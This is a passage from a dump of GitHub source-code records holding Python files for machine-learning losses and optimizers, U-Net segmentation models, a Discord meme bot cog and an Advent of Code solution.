similarity scores\n if isinstance(sim_i,list):\n s = torch.cat(sim_i,dim=0)\n elif isinstance(sim_i,torch.Tensor):\n s = sim_i.reshape(N*BS,-1)\n else:\n raise TypeError(\"Unknown sim_i type [{}]\".format(type(sim_i)))\n simmat = self.similarity_f(s.unsqueeze(1),s.unsqueeze(0)) / temperature\n pos_samples = simmat[mask_pos].reshape(Kpos,1) # NumA x 1\n neg_samples = simmat[mask_neg].reshape(Kneg,-1) # NumA x NumA-2 (\"same\" and \"1\")\n\n # create logits and labels\n logits = []\n for n in range(N-1):\n logit = torch.cat((pos_samples[n::(N-1)],neg_samples),dim=1)\n logits.append(logit)\n logits = torch.cat(logits,dim=0)\n labels = torch.zeros(Kpos).to(pos_samples.device).long()\n\n # run loss\n loss = self.criterion(logits, labels)\n loss /= Kpos\n return loss\n \n\n def get_masks(self, Nsizes, BS):\n masks_neg,masks_pos = {},{}\n for N in Nsizes:\n mask_neg = self.get_mask_neg(N, BS)\n masks_neg[N] = mask_neg\n masks_pos[N] = self.get_mask_pos(mask_neg)\n return masks_neg,masks_pos\n\n def get_mask_neg(self, num_transforms, batch_size):\n K = num_transforms * batch_size\n mask = np.zeros((K,K), dtype=np.int)\n for n in range(num_transforms-1):\n ones = np.ones(K-batch_size*(n+1))\n dmask = np.diag(ones,(n+1)*batch_size).astype(np.int)\n mask += dmask\n dmask = np.diag(ones,-(n+1)*batch_size).astype(np.int)\n mask += dmask\n mask = np.logical_not(mask)\n np.fill_diagonal(mask,0)\n mask = torch.from_numpy(mask).type(torch.bool)\n return mask\n\n def get_mask_pos(self,mask_sim):\n mask = mask_sim.clone()\n mask = torch.logical_not(mask)\n mask = mask.fill_diagonal_(0)\n return mask\n\n\n","repo_name":"gauenk/cl_gen","sub_path":"lib/layers/denoising/loss_ddp.py","file_name":"loss_ddp.py","file_ext":"py","file_size_in_byte":5623,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"21590821658","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# Python version: 3.6\n\nimport pdb\nimport torch\nimport torch.nn.functional as F\nimport torch.backends.cudnn as cudnn\n\nimport torch.utils.data.distributed\nfrom torch.optim import Optimizer\n\n\n\n# https://discuss.pytorch.org/t/a-problem-about-optimizer-param-groups-in-step-function/14463\nclass sparsetopSGD(Optimizer):\n def __init__(self, params, lr=0.1, topk=0.1, momentum=0, dampening=0,\n weight_decay=0, nesterov=False, required=True):\n if lr is not required and lr < 0.0:\n raise ValueError(\"Invalid learning rate: {}\".format(lr))\n if momentum < 0.0:\n raise ValueError(\"Invalid momentum value: {}\".format(momentum))\n if weight_decay < 0.0:\n raise ValueError(\"Invalid weight_decay value: {}\".format(weight_decay))\n\n defaults = dict(lr=lr, topk=topk, momentum=momentum, dampening=dampening,\n weight_decay=weight_decay, nesterov=nesterov)\n \n if nesterov and (momentum <= 0 or dampening != 0):\n raise ValueError(\"Nesterov momentum requires a momentum and zero dampening\")\n \n super(sparsetopSGD, self).__init__(params, defaults)\n\n \n gradient_size = 0\n for group in self.param_groups:\n for p in group['params']:\n param_state = self.state[p]\n param_state['memory'] = torch.zeros_like(p.data)\n gradient_size += torch.numel(p.data)\n\n self.iteration = 0\n self.gradient_after_topk = torch.zeros(gradient_size)\n self.gradient_before_topk = torch.zeros(gradient_size)\n self.gradient_without_error = torch.zeros(gradient_size)\n self.error = torch.zeros(gradient_size)\n\n def __setstate__(self, state):\n super(sparsetopSGD, self).__setstate__(state)\n for group in 
self.param_groups:\n group.setdefault('nesterov', False)\n\n @torch.no_grad()\n def step(self, closure=None):\n loss = None\n if closure is not None:\n with torch.enable_grad():\n loss = closure()\n\n #print(\"Length of param_groups: \", len(self.param_groups))\n\n if (len(self.param_groups) > 1):\n raise ValueError(\"TopK sparsification not available for more than one parameter group\")\n\n for group in self.param_groups:\n weight_decay = group['weight_decay']\n momentum = group['momentum']\n dampening = group['dampening']\n nesterov = group['nesterov']\n lr = group['lr']\n topk = group['topk']\n\n # lists used in the actual calculation of gradients\n param_size = []\n gradient_shape = []\n gradients = []\n\n\n gradients_without_error = []\n errors = []\n\n for p in group['params']: \n\n param_state = self.state[p]\n if p.grad is None:\n continue\n\n d_p = p.grad\n corrected_gradient = group['lr'] * d_p\n\n # save for \n gradients_without_error.append(torch.flatten(corrected_gradient.detach().clone()))\n\n\n corrected_gradient = param_state['memory'] + corrected_gradient\n\n errors.append( torch.flatten(param_state['memory'].detach().clone()) )\n\n # save gradient shape\n gradient_shape.append(corrected_gradient.shape)\n\n corrected_gradient = torch.flatten(corrected_gradient)\n\n param_size.append(corrected_gradient.size(dim=0))\n gradients.append(corrected_gradient)\n\n if len(gradients) > 0:\n self.gradient_without_error = torch.cat(gradients_without_error, dim=0)\n\n all_gradients = torch.cat(gradients, dim=0)\n self.error = torch.cat(errors, dim=0)\n\n # self.raw_gradient = torch.cat(gradients_error_not_adjusted, dim=0)\n self.gradient_before_topk = all_gradients.detach().clone()\n\n abs_all_gradients = abs(all_gradients)\n\n _, indices = torch.topk(abs_all_gradients, int( (1 - topk) * all_gradients.shape[0]), dim=0, largest=False)\n\n all_gradients[indices] = 0\n\n self.gradient_after_topk = all_gradients.detach().clone()\n\n sparsified_gradients = torch.split(all_gradients, param_size)\n\n\n i = 0\n for p in group['params']:\n param_state = self.state[p]\n if p.grad is None:\n continue\n\n d_p = p.grad\n corrected_gradient = group['lr'] * d_p\n corrected_gradient = param_state['memory'] + corrected_gradient\n\n sparsified_gradient = torch.reshape(sparsified_gradients[i], gradient_shape[i])\n param_state['memory'] = corrected_gradient - sparsified_gradient\n p.data.add_(sparsified_gradient, alpha=-1)\n i += 1\n\n self.iteration += 1 \n return loss","repo_name":"wyxzou/Federated-Learning-PyTorch","sub_path":"src/sparsification.py","file_name":"sparsification.py","file_ext":"py","file_size_in_byte":5064,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"38700690256","text":"import logging\nimport random\nimport time\nimport io\nimport os\nimport datetime\nimport concurrent.futures\nimport typing as t\n\nimport discord\nimport discord.ext.commands as commands\nfrom PIL import Image, ImageDraw, ImageSequence, ImageFont\n\nfrom bot.consts import Colors\n\nlog = logging.getLogger(__name__)\nMAX_WALDO_GRID_SIZE = 100\nCRAB_LINE_LENGTH = 58\nCRAB_COMMAND_COOLDOWN = 3\n\ndef pillow_process(args, is_rave, lines_in_text, timestamp):\n # Open crab.gif and add our font\n im = Image.open('bot/cogs/memes_cog/assets/crab.gif')\n fnt = ImageFont.truetype('bot/cogs/memes_cog/assets/LemonMilk.otf', 11)\n \n # Draw text on each frame of the gif\n # Gonna be honest I don't quite understand how it works but I got it from the Pillow docs/issues\n 
frames = []\n for frame in ImageSequence.Iterator(im):\n d = ImageDraw.Draw(frame)\n w, h = d.textsize(args, fnt)\n # draws the text on to the frame. Tries to center horizontally and tries to go as close to the bottom as possible\n d.text((im.size[0]/2 - w/2, im.size[1] - h - (5 * lines_in_text)), args, font=fnt, align='center',\n stroke_width=bool(is_rave), stroke_fill=Colors.ClemsonOrange, spacing=6)\n del d\n\n b = io.BytesIO()\n frame.save(b, format='GIF')\n frame = Image.open(b)\n frames.append(frame)\n frames[0].save(f'bot/cogs/memes_cog/assets/out_{timestamp}.gif', save_all=True, append_images=frames[1:])\n\nclass MemesCog(commands.Cog):\n\n def __init__(self, bot):\n self.bot = bot\n \n @commands.command()\n async def bubblewrap(self, ctx):\n\n msg = ''\n for _ in range(0, 5):\n for _ in range(0, 10):\n msg += '||pop!|| '\n msg += '\\n'\n\n await ctx.send(msg)\n\n @commands.command()\n async def waldo(self, ctx, size=MAX_WALDO_GRID_SIZE):\n\n \"\"\"\n Play Where's Waldo!\n\n Usage: waldo [size = 100]\n \"\"\"\n random_start_letters = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','X','Y','Z']\n\n max_waldo_line_size = 6\n new_line_waldo_chance = 10\n msg = ''\n count = 0\n place = random.randint(0,size)\n\n for i in range(size+1):\n if i == place:\n msg += '||`WALDO`|| '\n count += 1\n else:\n helper = random.randint(0,len(random_start_letters)-1)\n letter = random_start_letters[helper]\n msg += f'||`{letter}ALDO`|| '\n count += 1\n \n new_line = random.randint(0,100)\n\n if new_line < new_line_waldo_chance or count > max_waldo_line_size:\n msg += '\\n'\n count = 0\n\n await ctx.send(msg)\n\n @commands.command()\n async def spongebob(self, ctx, *, args):\n\n \"\"\"\n Spongebob Text\n \"\"\"\n random.seed(time.time())\n args = args.replace('\"', \"'\")\n \n result = ''\n for i in args:\n helper = random.randint(0, 100)\n \n if helper > 60:\n result += str(i).upper()\n else:\n result += str(i).lower()\n\n embed = discord.Embed(title=\"SpOnGeBoB\", color=Colors.ClemsonOrange)\n result2 = ''\n\n # Discord messages can only be 2k characters long, this block accounts for that\n if len(result) >= 1024:\n result2 = result[1024:len(result)]\n result = result[:1023]\n embed.add_field(name=\"TeXt\", value=result, inline=False)\n\n if result2:\n embed.add_field(name=\"tExT\", value=result2, inline=False)\n \n\n await ctx.send(embed=embed)\n\n @commands.command(aliases=['rave', '🦀'])\n @commands.cooldown(1, CRAB_COMMAND_COOLDOWN, commands.BucketType.guild)\n async def crab(self, ctx, is_rave: t.Optional[bool] = True, *, args='Bottom text\\n is dead'):\n \"\"\"\n Create your own crab rave.\n Usage: crab [is_rave=True] [text=Bottom text\\\\n is dead]\n Aliases: rave, 🦀\n \"\"\"\n # crab.gif dimensions - 352 by 200\n # Immediately grab the timestamp incase of multiple calls in a row\n timestamp = datetime.datetime.utcnow()\n msg = await ctx.send('Generating your gif')\n \n # Add new lines for when the text would go out of bounds\n lines_in_text = 1\n while len(args) > (CRAB_LINE_LENGTH * lines_in_text):\n newline_loc = CRAB_LINE_LENGTH * lines_in_text\n # I didn't want to add a newline in the middle of a word\n while not args[newline_loc].isspace():\n newline_loc -= 1\n if newline_loc == CRAB_LINE_LENGTH * (lines_in_text - 1):\n newline_loc = CRAB_LINE_LENGTH * lines_in_text\n break\n\n args = f'{args[:newline_loc]} \\n{args[newline_loc:]}'\n lines_in_text += 1\n \n loop = self.bot.loop\n with concurrent.futures.ProcessPoolExecutor() as pool:\n pil_args = 
(args, is_rave, lines_in_text, timestamp)\n await loop.run_in_executor(pool, pillow_process, *pil_args)\n\n # Attach, send, and delete created gif\n attachment = discord.File(filename=f'out_{timestamp}.gif', fp=f'bot/cogs/memes_cog/assets/out_{timestamp}.gif')\n await ctx.send(file=attachment)\n await msg.delete()\n os.remove(f'bot/cogs/memes_cog/assets/out_{timestamp}.gif')\n\n @commands.command(aliases=['8ball','🎱'])\n async def ball(self, ctx, *, question):\n \"\"\"\n A simple magic 8 ball than can be used with 'ball' or '8ball'\n Example:\n ball Will I have a good day today?\n 8ball Will I have a bad day today?\n \"\"\"\n responses = [\n 'It is certain.',\n 'It is decidedly so.',\n 'Without a doubt.',\n 'Yes – definitely.',\n 'You may rely on it.',\n 'As I see it, yes.',\n 'Most likely.',\n 'Outlook good.',\n 'Yes.',\n 'Signs point to yes.',\n 'Reply hazy, try again.',\n 'Ask again later.',\n 'Better not tell you now.',\n 'Cannot predict now.',\n 'Concentrate and ask again.',\n 'Don\\'t count on it.',\n 'My reply is no.',\n 'My sources say no.',\n 'Outlook not so good.',\n 'Very doubtful.'\n ]\n embed = discord.Embed(title='🎱', description= f'{random.choice(responses)}',color = Colors.ClemsonOrange)\n await ctx.send(embed=embed)\n\ndef setup(bot):\n bot.add_cog(MemesCog(bot))\n","repo_name":"new-zelind/ClemBot","sub_path":"bot/cogs/memes_cog/memes_cog.py","file_name":"memes_cog.py","file_ext":"py","file_size_in_byte":6687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"76"} +{"seq_id":"21194199848","text":"import time\nfrom math import ceil\nfrom math import inf\n\n\ntime1 = time.time()\ndef func():\n input_f = open('input_13.1.txt', 'r')\n input_d = input_f.readlines()\n\n time = int(input_d[0][:-1])\n busses = input_d[1].split(',')\n\n mult = 1\n t = 0\n for i, b in enumerate(busses):\n if b != 'x':\n while (t + i) % int(b) != 0:\n t += mult\n mult *= int(b)\n\n return(t)\n \n\nprint(func())\nprint(\"time: \" + str((time.time() - time1) * 1000) + \"ms\")\n","repo_name":"th3tard1sparadox/aoc","sub_path":"aoc20/13.2.py","file_name":"13.2.py","file_ext":"py","file_size_in_byte":501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"7264699420","text":"from __future__ import division \nimport tensorflow as tf \nslim = tf.contrib.slim \n\ndef conv_residual_block(net, num_features, is_training, is_batch_norm, layer_name):\n \"\"\" Unet_V2 residual conv block \n Inputs: net - input feature map\n num_features - number of features in convolution block\n is_training - boolean whether to train graph or validate/test\n is_batch_norm - boolean whether to have batchnorm activated or not\n layer_name - scope name for layer\n\n Output: net - a feature map \n \"\"\"\n with tf.variable_scope(layer_name):\n net = slim.conv2d(net, num_features, [3,3], activation_fn=None, normalizer_fn=None, scope='conv%d_2' % int(layer_name[-1]))\n if is_batch_norm:\n net = slim.batch_norm(net, is_training=is_training, decay=0.997, \n epsilon=1e-5, center=True, scale=True,scope='batch_norm2')\n shortcut = tf.nn.relu(net)\n net = shortcut\n net = slim.conv2d(net, num_features, [3,3], activation_fn=None, normalizer_fn=None, scope='conv%d_3' % int(layer_name[-1]))\n if is_batch_norm:\n net = slim.batch_norm(net, is_training=is_training, decay=0.997, \n epsilon=1e-5, center=True, scale=True,scope='batch_norm3')\n net = tf.nn.relu(net)\n net = slim.conv2d(net, num_features, [3,3], activation_fn=None, normalizer_fn=None, 
scope='conv%d_4' % int(layer_name[-1]))\n if is_batch_norm:\n net = slim.batch_norm(net, is_training=is_training, decay=0.997, \n epsilon=1e-5, center=True, scale=True,scope='batch_norm4')\n net = tf.nn.relu(net + shortcut)\n return net\n\ndef conv_bn_relu(net, num_features, is_training, is_batch_norm, scope_name):\n net = slim.conv2d(net, num_features, [3,3], activation_fn=None, normalizer_fn=None, scope=scope_name)\n if is_batch_norm:\n net = slim.batch_norm(net, is_training=is_training, decay=0.997, \n epsilon=1e-5, center=True, scale=True,scope='batch_norm%d'% int(scope_name[-1]))\n net = tf.nn.relu(net)\n return net\n\n\ndef unet_arg_scope(weight_decay=1e-4):\n \"\"\"Defines the Unet arg scope.\n Input: weight_decay - The l2 regularization coefficient\n Output: arg_scope - argument scope of model\n \"\"\"\n with slim.arg_scope([slim.conv2d],\n padding='SAME',\n activation_fn=tf.nn.relu,\n weights_regularizer=slim.l2_regularizer(weight_decay),\n biases_initializer=tf.zeros_initializer()) as arg_sc:\n return arg_sc\n\n##########################################\n# Unet: https://arxiv.org/abs/1505.04597 #\n##########################################\n\ndef Unet(inputs,\n is_training=True,\n num_classes = 2,\n scope='unet'):\n \"\"\" Unet \n Inputs: inputs - input image batch\n is_training - boolean whether to train graph or validate/test\n dropout_keep_prob - probability that each element is kept\n scope - scope name for model\n Outputs: output_map - output logits\n end_points - output dic\n \"\"\"\n\n with tf.variable_scope(scope, 'unet', [inputs]) as sc:\n end_points_collection = sc.name + '_end_points'\n # Collect outputs for conv2d, and max_pool2d.\n with slim.arg_scope([slim.conv2d,slim.conv2d_transpose, slim.max_pool2d],\n outputs_collections=end_points_collection):\n\n ######################\n # downsampling path #\n ######################\n conv1_1 = slim.conv2d(inputs, 64, [3,3], scope='conv1/conv1_1')\n conv1_2 = slim.conv2d(conv1_1, 64, [3,3], scope='conv1/conv1_2')\n pool1 = slim.max_pool2d(conv1_2, [2, 2], scope='pool1')\n\n conv2_1 = slim.conv2d(pool1, 128, [3,3], scope='conv2/conv2_1')\n conv2_2 = slim.conv2d(conv2_1, 128, [3,3], scope='conv2/conv2_2')\n pool2 = slim.max_pool2d(conv2_2, [2, 2], scope='pool2')\n\n conv3_1 = slim.conv2d(pool2, 256, [3,3], scope='conv3/conv3_1')\n conv3_2 = slim.conv2d(conv3_1, 256, [3,3], scope='conv3/conv3_2')\n pool3 = slim.max_pool2d(conv3_2, [2, 2], scope='pool3')\n\n conv4_1 = slim.conv2d(pool3, 512, [3,3], scope='conv4/conv4_1')\n conv4_2 = slim.conv2d(conv4_1, 512, [3,3], scope='conv4/conv4_2')\n pool4 = slim.max_pool2d(conv4_2, [2, 2], scope='pool4')\n\n ##############\n # bottleneck #\n ##############\n conv5_1 = slim.conv2d(pool4, 1024, [3,3], scope='conv5/conv5_1')\n conv5_2 = slim.conv2d(conv5_1, 1024, [3,3], scope='conv5/conv5_2')\n\n ###################\n # upsampling path #\n ###################\n conv6_1 = slim.conv2d_transpose(conv5_2, 512, [2,2], stride=2, scope='conv6/transpose_conv6_1')\n merge_1 = tf.concat([conv6_1, conv4_2], axis=-1, name='merge1') \n conv6_2 = slim.conv2d(merge_1, 512, [3,3], scope='conv6/conv6_2')\n conv6_3 = slim.conv2d(conv6_2, 512, [3,3], scope='conv6/conv6_3')\n\n conv7_1 = slim.conv2d_transpose(conv6_3, 256, [2,2], stride=2, scope = 'conv7/transpose_conv7_1')\n merge_2 = tf.concat([conv7_1, conv3_2], axis=-1, name='merge2')\n conv7_2 = slim.conv2d(merge_2, 256, [3,3], scope='conv7/conv7_2')\n conv7_3 = slim.conv2d(conv7_2, 256, [3,3], scope='conv7/conv7_3')\n\n conv8_1 = 
slim.conv2d_transpose(conv7_3, 128, [2,2], stride=2, scope = 'conv8/transpose_conv8_1')\n merge_3 = tf.concat([conv8_1, conv2_2], axis=-1, name='merge3') \n conv8_2 = slim.conv2d(merge_3, 128, [3,3], scope='conv8/conv8_2')\n conv8_3 = slim.conv2d(conv8_2, 128, [3,3], scope='conv8/conv8_3')\n\n conv9_1 = slim.conv2d_transpose(conv8_3, 64, [2,2], stride=2, scope = 'conv9/transpose_conv9_1')\n merge_4 = tf.concat([conv9_1, conv1_2], axis=-1, name='merge4') \n conv9_2 = slim.conv2d(merge_4, 64, [3,3], scope='conv9/conv9_2')\n conv9_3 = slim.conv2d(conv9_2, 64, [3,3], scope='conv9/conv9_3')\n\n ###############\n # outpput map #\n ###############\n output_map = slim.conv2d(conv9_3, num_classes, [1, 1], \n activation_fn=None, normalizer_fn=None, \n scope='output_layer')\n\n # Convert end_points_collection into a end_point dict.\n end_points = slim.utils.convert_collection_to_dict(end_points_collection)\n\n return output_map, end_points\n\n\n##############################################\n# FusionNet: https://arxiv.org/abs/1612.05360 #\n###############################################\n\ndef ResidualUnet(inputs,\n num_classes = 2,\n is_training = True,\n is_batch_norm = False,\n scope='fusionNet'):\n \"\"\" Modifided Unet \n Inputs: inputs - input image batch\n is_training - boolean whether to train graph or validate/test\n dropout_keep_prob - probability that each element is kept\n scope - scope name for model\n Outputs: output_map - output logits\n end_points - output dic\n \"\"\"\n with tf.variable_scope(scope, 'fusionNet', [inputs]) as sc:\n end_points_collection = sc.name + '_end_points'\n # Collect outputs for conv2d, and max_pool2d.\n with slim.arg_scope([slim.conv2d, slim.conv2d_transpose, slim.max_pool2d],\n outputs_collections=end_points_collection):\n\n ######################\n # downsampling path #\n ######################\n conv1_1 = conv_bn_relu(inputs, 64, is_training, is_batch_norm, 'conv1/conv1_1')\n conv1 = conv_residual_block(conv1_1, 64, is_training, is_batch_norm, 'conv1')\n conv1_5 = conv_bn_relu(conv1, 64, is_training, is_batch_norm, 'conv1/conv1_5')\n pool1 = slim.max_pool2d(conv1_5, [2, 2], scope='pool1')\n\n conv2_1 = conv_bn_relu(pool1, 128, is_training, is_batch_norm, 'conv2/conv2_1')\n conv2 = conv_residual_block(conv2_1, 128, is_training, is_batch_norm, 'conv2')\n conv2_5 = conv_bn_relu(conv2, 128, is_training, is_batch_norm, 'conv2/conv2_5')\n pool2 = slim.max_pool2d(conv2_5, [2, 2], scope='pool2')\n\n conv3_1 = conv_bn_relu(pool2, 256, is_training, is_batch_norm, 'conv3/conv3_1')\n conv3 = conv_residual_block(conv3_1, 256, is_training, is_batch_norm, 'conv3')\n conv3_5 = conv_bn_relu(conv3, 256, is_training, is_batch_norm, 'conv3/conv3_5')\n pool3 = slim.max_pool2d(conv3_5, [2, 2], scope='pool3')\n\n conv4_1 = conv_bn_relu(pool3, 512, is_training, is_batch_norm, 'conv4/conv4_1')\n conv4 = conv_residual_block(conv4_1, 512, is_training, is_batch_norm, 'conv4')\n conv4_5 = conv_bn_relu(conv4, 512, is_training, is_batch_norm, 'conv4/conv4_5')\n pool4 = slim.max_pool2d(conv4_5, [2, 2], scope='pool4')\n\n\n ##############\n # bottleneck #\n ##############\n conv5_1 = conv_bn_relu(pool4, 1024, is_training, is_batch_norm, 'conv5/conv5_1')\n conv5 = conv_residual_block(conv5_1, 1024, is_training, is_batch_norm, 'conv5')\n conv5_5 = conv_bn_relu(conv5, 1024, is_training, is_batch_norm, 'conv5/conv5_5')\n\n ###################\n # upsampling path #\n ###################\n conv6_up = slim.conv2d_transpose(conv5_5, 512, [2,2], activation_fn=None, normalizer_fn=None, stride=2, 
scope='conv6/transpose_conv6')\n conv6_up += conv4_5\n conv6_up = tf.nn.relu(conv6_up)\n conv6_1 = conv_bn_relu(conv6_up, 512, is_training, is_batch_norm, 'conv6/conv6_1')\n conv6 = conv_residual_block(conv6_1, 512, is_training, is_batch_norm, 'conv6')\n conv6_5 = conv_bn_relu(conv6, 512, is_training, is_batch_norm, 'conv6/conv6_5')\n \n conv7_up = slim.conv2d_transpose(conv6_5, 256, [2,2], activation_fn=None, normalizer_fn=None, stride=2, scope='conv7/transpose_conv7')\n conv7_up += conv3_5\n conv7_up = tf.nn.relu(conv7_up)\n conv7_1 = conv_bn_relu(conv7_up, 256, is_training, is_batch_norm, 'conv7/conv7_1')\n conv7 = conv_residual_block(conv7_1, 256, is_training, is_batch_norm, 'conv7')\n conv7_5 = conv_bn_relu(conv7, 256, is_training, is_batch_norm, 'conv7/conv7_5')\n\n conv8_up = slim.conv2d_transpose(conv7_5, 128, [2,2], activation_fn=None, normalizer_fn=None, stride=2, scope='conv8/transpose_conv8')\n conv8_up += conv2_5\n conv8_up = tf.nn.relu(conv8_up)\n conv8_1 = conv_bn_relu(conv8_up, 128, is_training, is_batch_norm, 'conv8/conv8_1')\n conv8 = conv_residual_block(conv8_1, 128, is_training, is_batch_norm, 'conv8')\n conv8_5 = conv_bn_relu(conv8, 128, is_training, is_batch_norm, 'conv8/conv8_5')\n\n conv9_up = slim.conv2d_transpose(conv8_5, 64, [2,2], activation_fn=None, normalizer_fn=None, stride=2, scope='conv9/transpose_conv9')\n conv9_up += conv1_5\n conv9_up = tf.nn.relu(conv9_up)\n conv9_1 = conv_bn_relu(conv9_up, 64, is_training, is_batch_norm, 'conv9/conv9_1')\n conv9 = conv_residual_block(conv9_1, 64, is_training, is_batch_norm, 'conv9')\n conv9_5 = conv_bn_relu(conv9, 64, is_training, is_batch_norm, 'conv9/conv9_5')\n\n ###############\n # outpput map #\n ###############\n output_map = slim.conv2d(conv9_5, num_classes, [1, 1], \n activation_fn=None, normalizer_fn=None, \n scope='output_layer')\n\n # Convert end_points_collection into a end_point dict.\n end_points = slim.utils.convert_collection_to_dict(end_points_collection)\n\n return output_map, end_points\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"akaragou/connectomics","sub_path":"unet.py","file_name":"unet.py","file_ext":"py","file_size_in_byte":11607,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"39517385092","text":"import math\n\nimport torch\nimport torch.nn.functional as F\nfrom torch import nn\nfrom torch.autograd import Variable\nfrom torch.nn import CrossEntropyLoss as CELoss\nfrom torch.nn.functional import linear, normalize\n\n\nclass CrossEntropyLoss(CELoss):\n \"\"\"Rewrite CrossEntropyLoss to support init with kwargs\"\"\"\n\n def __init__(self, feat_dim: int, num_classes: int, lambda_c: float = 1.0, **kwargs):\n super(CrossEntropyLoss, self).__init__(**kwargs)\n\n def forward(self, input: torch.Tensor, target: torch.Tensor) -> torch.Tensor:\n out = input[0]\n return super().forward(out, target)\n\n\nclass CenterLoss(nn.Module):\n def __init__(self, feat_dim: int, num_classes: int, lambda_c: float = 1.0):\n super(CenterLoss, self).__init__()\n self.feat_dim = feat_dim\n self.num_classes = num_classes\n self.lambda_c = lambda_c\n self.centers = nn.Parameter(torch.randn(num_classes, feat_dim))\n\n def forward(self, feat: torch.Tensor, label: torch.Tensor) -> torch.Tensor:\n batch_size = feat.size()[0]\n expanded_centers = self.centers.index_select(dim=0, index=label)\n intra_distances = feat.dist(expanded_centers)\n loss = (self.lambda_c / 2.0 / batch_size) * intra_distances\n return loss\n\n\nclass ContrastiveCenterLoss(nn.Module):\n def 
__init__(self, feat_dim: int, num_classes: int, lambda_c: float = 1.0):\n super(ContrastiveCenterLoss, self).__init__()\n self.feat_dim = feat_dim\n self.num_classes = num_classes\n self.lambda_c = lambda_c\n self.centers = nn.Parameter(torch.randn(num_classes, feat_dim))\n\n # may not work due to flowing gradient. change center calculation to exp moving avg may work.\n def forward(self, feat: torch.Tensor, label: torch.Tensor) -> torch.Tensor:\n batch_size = feat.size()[0]\n expanded_centers = self.centers.expand(batch_size, -1, -1)\n expanded_feat = feat.expand(self.num_classes, -1, -1).transpose(1, 0)\n distance_centers = (expanded_feat - expanded_centers).pow(2).sum(dim=-1)\n distances_same = distance_centers.gather(1, label.unsqueeze(1))\n intra_distances = distances_same.sum()\n inter_distances = distance_centers.sum().sub(intra_distances)\n epsilon = 1e-6\n loss = (self.lambda_c / 2.0 / batch_size) * intra_distances / (inter_distances + epsilon) / 0.1\n\n return loss\n\n\nclass CrossEntropyLoss_ContrastiveCenterLoss(nn.Module):\n def __init__(self, feat_dim: int, num_classes: int, lambda_c: float = 1.0):\n super(CrossEntropyLoss_ContrastiveCenterLoss, self).__init__()\n self.cc_loss = ContrastiveCenterLoss(feat_dim, num_classes, lambda_c)\n self.ce_loss = CELoss()\n\n def forward(self, feat: torch.Tensor, label: torch.Tensor) -> torch.Tensor:\n logits = feat[0]\n feat_fusion = feat[1]\n\n ce_loss = self.ce_loss(logits, label)\n cc_loss = self.cc_loss(feat_fusion, label)\n total_loss = ce_loss + cc_loss\n return total_loss\n\n\nclass CrossEntropyLoss_CenterLoss(nn.Module):\n def __init__(self, feat_dim: int, num_classes: int, lambda_c: float = 1.0):\n super(CrossEntropyLoss_CenterLoss, self).__init__()\n self.c_loss = CenterLoss(feat_dim, num_classes, lambda_c)\n self.ce_loss = CELoss()\n\n def forward(self, feat: torch.Tensor, label: torch.Tensor) -> torch.Tensor:\n logits = feat[0]\n feat_fusion = feat[1]\n\n ce_loss = self.ce_loss(logits, label)\n c_loss = self.c_loss(feat_fusion, label)\n total_loss = ce_loss + c_loss\n return total_loss\n\n\nclass ContrastiveCenterLossSER(ContrastiveCenterLoss):\n def forward(self, feat: torch.Tensor, label: torch.Tensor) -> torch.Tensor:\n feat_fusion = feat[1]\n loss = super().forward(feat_fusion, label)\n return loss\n\n\nclass CenterLossSER(CenterLoss):\n def forward(self, feat: torch.Tensor, label: torch.Tensor) -> torch.Tensor:\n feat_fusion = feat[1]\n loss = super().forward(feat_fusion, label)\n return loss\n\n\nclass CombinedMarginLoss(nn.Module):\n def __init__(\n self,\n in_features: int,\n out_features: int,\n s: float,\n m1: float,\n m2: float,\n m3: float,\n ):\n \"\"\"Combined margin loss for SphereFace, CosFace, ArcFace\n\n Args:\n in_features (int): the size of feature vector\n out_features (int): the number of classes\n s (float): scale factor\n m1 (float): margin for SphereFace\n m2 (float): margin for ArcFace, m1 must be 1.0\n m3 (float): margin for CosFace, m1 must be 1.0\n \"\"\"\n super(CombinedMarginLoss, self).__init__()\n self.in_features = in_features\n self.out_features = out_features\n self.s = s\n self.m1 = m1\n self.m2 = m2\n self.m3 = m3\n\n self.weight = torch.nn.Parameter(torch.normal(0, 0.01, (out_features, in_features)))\n\n # For ArcFace\n self.cos_m = math.cos(self.m2)\n self.sin_m = math.sin(self.m2)\n self.theta = math.cos(math.pi - self.m2)\n self.sinmm = math.sin(math.pi - self.m2) * self.m2\n self.easy_margin = False\n\n # CrossEntropyLoss\n self.ce_loss = CELoss()\n\n def forward(self, embbedings: 
torch.Tensor, labels: torch.Tensor) -> torch.Tensor:\n weight = self.weight\n norm_embeddings = normalize(embbedings)\n norm_weight_activated = normalize(weight)\n logits = linear(norm_embeddings, norm_weight_activated)\n logits = logits.clamp(-1, 1)\n\n index_positive = torch.where(labels != -1)[0]\n target_logit = logits[index_positive, labels[index_positive].view(-1)]\n\n if self.m1 == 1.0 and self.m3 == 0.0:\n with torch.no_grad():\n target_logit.arccos_()\n logits.arccos_()\n final_target_logit = target_logit + self.m2\n logits[index_positive, labels[index_positive].view(-1)] = final_target_logit\n logits.cos_()\n logits = logits * self.s\n\n elif self.m3 > 0:\n final_target_logit = target_logit - self.m3\n logits[index_positive, labels[index_positive].view(-1)] = final_target_logit\n logits = logits * self.s\n else:\n raise ValueError(\"Unsupported margin values.\")\n\n loss = self.ce_loss(logits, labels)\n return loss, logits\n\n\nclass FocalLoss(nn.Module):\n def __init__(self, gamma: float = 0.0, alpha: float = None, size_average: bool = True):\n super(FocalLoss, self).__init__()\n self.gamma = gamma\n self.alpha = alpha\n if isinstance(alpha, (float, int)):\n self.alpha = torch.Tensor([alpha, 1 - alpha])\n if isinstance(alpha, list):\n self.alpha = torch.Tensor(alpha)\n self.size_average = size_average\n\n def forward(self, input: torch.Tensor, target: torch.Tensor) -> torch.Tensor:\n input = input[0]\n if input.dim() > 2:\n input = input.view(input.size(0), input.size(1), -1) # N,C,H,W => N,C,H*W\n input = input.transpose(1, 2) # N,C,H*W => N,H*W,C\n input = input.contiguous().view(-1, input.size(2)) # N,H*W,C => 